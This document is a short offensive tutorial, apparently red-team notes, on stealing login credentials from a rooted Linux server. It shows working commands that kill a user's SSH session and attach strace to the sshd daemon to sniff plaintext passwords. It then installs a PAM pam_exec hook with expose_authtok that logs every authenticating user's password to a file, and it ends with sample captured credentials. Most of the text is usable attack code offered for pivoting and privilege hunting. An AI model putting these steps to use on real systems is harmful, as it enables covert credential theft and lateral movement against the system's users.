With root access on a server we can attach to the SSH service and sniff usernames and passwords in plaintext if a user authenticates. This can be powerful when looking for new accounts to pivot with and/or higher privileged accounts.
[root@victimHost ~]# w
15:05:18 up 26 days, 6:25, 2 users, load average: 0.00, 0.05, 0.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
unixadm pts/0 someHost 15:04 6.00s 0.03s 0.00s sshd: unixadm [priv]
[root@victimHost ~]# ps aux | grep ssh
root 1366 0.0 0.0 113000 4368 ? Ss Jun02 0:00 /usr/sbin/sshd -D
unixadm 28721 0.0 0.0 176412 2644 ? S 10:04 0:00 sshd: unixadm@pts/0
[root@victimHost ~]# kill 28721
[root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log
strace: Process 1366 attached
Modifying PAM
## Create the simple script to log logins
$ vim /usr/local/bin/capture.sh
$ chmod 700 /usr/local/bin/capture.sh
$ cat /usr/local/bin/capture.sh
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/creds.log
## Create log file and set high permissions so no unauthorized suer reads it
$ touch /var/log/creds.log
$ chmod 600 /var/log/creds.log
## Edit /etc/pam.d/common-auth and add the following line
$ vim /etc/pam.d/common-auth
$ cat /etc/pam.d/common-auth
...
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh
## All services using PAM will now be logged to /var/log/creds.log in clear text
➜ ~ cat /var/log/creds.log
Wed Nov 22 12:54:20 CET 2023 p3, Passw0rd!, From: ::1
Wed Nov 22 12:56:54 CET 2023 void, Passw0rd!, From: